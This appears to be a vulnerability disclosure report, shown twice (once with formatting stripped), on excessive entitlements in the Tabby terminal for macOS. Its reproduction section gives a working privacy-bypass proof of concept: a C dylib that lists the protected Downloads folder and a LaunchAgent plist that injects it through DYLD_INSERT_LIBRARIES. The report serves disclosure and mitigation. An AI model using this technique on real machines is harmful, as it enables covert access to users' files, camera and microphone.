Description
Tabby terminal emulator contains overly permissive entitlements that are unnecessary for its core functionality and plugin system, creating potential security vulnerabilities. The application currently holds powerful permissions including camera, microphone access, and the ability to access personal folders (Downloads, Documents, etc.) through Apple Events, while also maintaining dangerous entitlements that enable code injection.
The concerning entitlements include:
- com.apple.security.cs.allow-dyld-environment-variables
- com.apple.security.cs.disable-library-validation
These entitlements are not required for Tabby's operation since:
- Tabby's plugin system is NodeJS-based and doesn't require external native libraries
- No environment variables are used in the JavaScript codebase
- Other terminal emulators (like iTerm2 and waveterm) function without these entitlements
The combination of these unnecessary entitlements with Tabby's extensive TCC permissions (camera, microphone, and file access via Apple Events) creates a significant security risk.
Impact
The unnecessary entitlements enable multiple attack vectors:
TCC Bypass:
- Attackers can use
DYLD_INSERT_LIBRARY injection or dylib hijacking to inject malicious code
- Injected code inherits Tabby's extensive TCC permissions
- Access to camera, microphone, and personal folders becomes possible without user consent
Privacy Implications:
- Unauthorized access to sensitive hardware (camera, microphone)
- Access to personal directories through Apple Events
- Potential for silent surveillance via hardware access
Security Compromise:
- Malicious code execution within Tabby's context
- Inheritance of all granted permissions
- Bypass of macOS security controls despite hardened runtime
Considering Tabby's huge user base, and extensive TCC permissions it holds, consequences are particularly concerning.
Mitigation
Similar vulnerabilities involving TCC bypass through unnecessary entitlements have been documented in other popular applications:
CVE-2020-24259: Signal TCC bypassCVE-2023-26818: Telegram TCC bypass
Tabby's situation warrants additional attention as terminal emulators often require elevated privileges, successful TCC bypass poses higher risk. The current configuration exceeds necessary permissions for Tabby's functionality. Similar applications in the market demonstrate that these entitlements are not required for full terminal emulator operation with plugin support.
Recommended actions:
Since Tabby's plugins and themes are NodeJS-based without native libraries or frameworks, and no environment variables are used in the codebase, it is recommended to review and remove at least one of the entitlements (com.apple.security.cs.disable-library-validation or com.apple.security.cs.allow-dyld-environment-variables) to prevent DYLD_INSERT_LIBRARIES injection while maintaining full application functionality.
Reproduction
This vulnerability is relevant in post-exploitation scenarios where an attacker has gained initial device access through methods like service exploitation or phishing. After establishing a C2 or reverse shell connection with standard user privileges, the attacker faces TCC restrictions that prevent access to protected resources. Since C2 agents don't have granted TCC permissions by default, exploiting Tabby's overly permissive entitlements becomes an attractive privilege escalation path to bypass these restrictions and access protected resources. This scenario is common during the post-exploitation and local privilege escalation phases of an attack.
- Download the tabby app from the official release and use the
codesign utility to inspect its code signing information and entitlements. While tabby has Hardened Runtime enabled, its dangerous entitlements leave it vulnerable to code injection. Additionally, as terminal emulator software, tabby requires powerful TCC permissions for hardware and personal folders access. Tabby may request access to other resources via Apple Event as needed. While even the root account cannot access these components without user approval, an attacker can bypass TCC and access them without user approval or awareness.
adler@adlers-Mac-mini /Applications % codesign -dv --entitlement :- /Applications/Tabby.app | xmllint --format - Executable=/Applications/Tabby.app/Contents/MacOS/Tabby
Identifier=org.tabby
Format=app bundle with Mach-O thin (arm64)
CodeDirectory v=20500 size=757 flags=0x10000(runtime) hashes=13+7 location=embedded
Signature size=8995
Timestamp=Sep 26, 2024 at 4:16:48 AM
Info.plist entries=38
TeamIdentifier=V4JSMC46SY
Runtime Version=14.0.0
Sealed Resources version=2 rules=13 files=1593
Internal requirements count=1 size=172
warning: Specifying ':' in the path is deprecated and will not work in a future release
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "https://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>com.apple.security.automation.apple-events</key>
<true/>
<key>com.apple.security.cs.allow-dyld-environment-variables</key>
<true/>
<key>com.apple.security.cs.allow-jit</key>
<true/>
<key>com.apple.security.cs.allow-unsigned-executable-memory</key>
<true/>
<key>com.apple.security.cs.disable-library-validation</key>
<true/>
<key>com.apple.security.device.camera</key>
<true/>
<key>com.apple.security.device.microphone</key>
<true/>
</dict>
</plist>
- Create a custom dylib to access the TCC-protected Downloads folder, compile it.
#include <stdio.h>
#include <syslog.h>
#include <stdlib.h>
__attribute__((constructor))
static void myconstructor(int argc, const char **argv)
{
printf("[+] Crafted dylib is triggered\n");
syslog(LOG_ERR, "[+] Crafted dylib is triggered\n");
FILE *fp;
char path[1035];
fp = popen("ls -Ol /Users/adler/Downloads", "r");
if (fp == NULL) {
printf("Failed to run command\n");
}
while (fgets(path, sizeof(path), fp) != NULL) {
printf("%s", path);
}
pclose(fp);
}
- Create a plist file named
com.tabby.launcher.plist under ~/Library/LaunchAgent/. This file specifies the DYLD_INSERT_LIBRARIES environment variable, the program and its arguments, and the output file location.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>com.tabby.launcher</string>
<key>RunAtLoad</key>
<true/>
<key>EnvironmentVariables</key>
<dict>
<key>DYLD_INSERT_LIBRARIES</key>
<string>/Users/adler/tcc-exp/downloads_folder.dylib</string>
</dict>
<key>ProgramArguments</key>
<array>
<string>/Applications/Tabby.app/Contents/MacOS/Tabby</string>
</array>
<key>StandardOutPath</key>
<string>/tmp/tabby.log</string>
<key>StandardErrorPath</key>
<string>/tmp/tabby.log</string>
</dict>
</plist>
- Before exploitation, demonstrate the initial security state by confirming the
Downloads folder is inaccessible even with root privileges. Then, use the launchctl utility to execute launchctl load ~/Library/LaunchAgents/com.tabby.launcher.plist, which runs Tabby as a daemon to avoid inheriting the parent process's sandbox profile. Check /tmp/tabby.log to verify that contents of the Downloads folder are now listed, confirming successful TCC bypass. This same approach can be extended to access other TCC-protected resources including the Documents folder, camera, and microphone.
senzee1984 Reporter
Description
Tabby terminal emulator contains overly permissive entitlements that are unnecessary for its core functionality and plugin system, creating potential security vulnerabilities. The application currently holds powerful permissions including
camera,microphoneaccess, and the ability to accesspersonal folders (Downloads, Documents, etc.)through Apple Events, while also maintaining dangerous entitlements that enable code injection.The concerning entitlements include:
These entitlements are not required for Tabby's operation since:
The combination of these unnecessary entitlements with Tabby's extensive TCC permissions (camera, microphone, and file access via Apple Events) creates a significant security risk.
Impact
The unnecessary entitlements enable multiple attack vectors:
TCC Bypass:
DYLD_INSERT_LIBRARY injectionordylib hijackingto inject malicious codePrivacy Implications:
Security Compromise:
Considering Tabby's huge user base, and extensive TCC permissions it holds, consequences are particularly concerning.
Mitigation
Similar vulnerabilities involving TCC bypass through unnecessary entitlements have been documented in other popular applications:
CVE-2020-24259: Signal TCC bypassCVE-2023-26818: Telegram TCC bypassTabby's situation warrants additional attention as terminal emulators often require elevated privileges, successful TCC bypass poses higher risk. The current configuration exceeds necessary permissions for Tabby's functionality. Similar applications in the market demonstrate that these entitlements are not required for full terminal emulator operation with plugin support.
Recommended actions:
Since Tabby's plugins and themes are NodeJS-based without native libraries or frameworks, and no environment variables are used in the codebase, it is recommended to review and remove at least one of the entitlements (com.apple.security.cs.disable-library-validation or com.apple.security.cs.allow-dyld-environment-variables) to prevent DYLD_INSERT_LIBRARIES injection while maintaining full application functionality.
Reproduction
This vulnerability is relevant in post-exploitation scenarios where an attacker has gained initial device access through methods like service exploitation or phishing. After establishing a C2 or reverse shell connection with standard user privileges, the attacker faces TCC restrictions that prevent access to protected resources. Since C2 agents don't have granted TCC permissions by default, exploiting Tabby's overly permissive entitlements becomes an attractive privilege escalation path to bypass these restrictions and access protected resources. This scenario is common during the post-exploitation and local privilege escalation phases of an attack.
codesignutility to inspect its code signing information and entitlements. While tabby hasHardened Runtimeenabled, its dangerous entitlements leave it vulnerable to code injection. Additionally, as terminal emulator software, tabby requires powerful TCC permissions for hardware and personal folders access. Tabby may request access to other resources via Apple Event as needed. While even the root account cannot access these components without user approval, an attacker can bypass TCC and access them without user approval or awareness.com.tabby.launcher.plistunder~/Library/LaunchAgent/. This file specifies the DYLD_INSERT_LIBRARIES environment variable, the program and its arguments, and the output file location.Downloadsfolder is inaccessible even with root privileges. Then, use thelaunchctlutility to executelaunchctl load ~/Library/LaunchAgents/com.tabby.launcher.plist, which runs Tabby as a daemon to avoid inheriting the parent process's sandbox profile. Check/tmp/tabby.logto verify that contents of the Downloads folder are now listed, confirming successful TCC bypass. This same approach can be extended to access other TCC-protected resources including the Documents folder, camera, and microphone.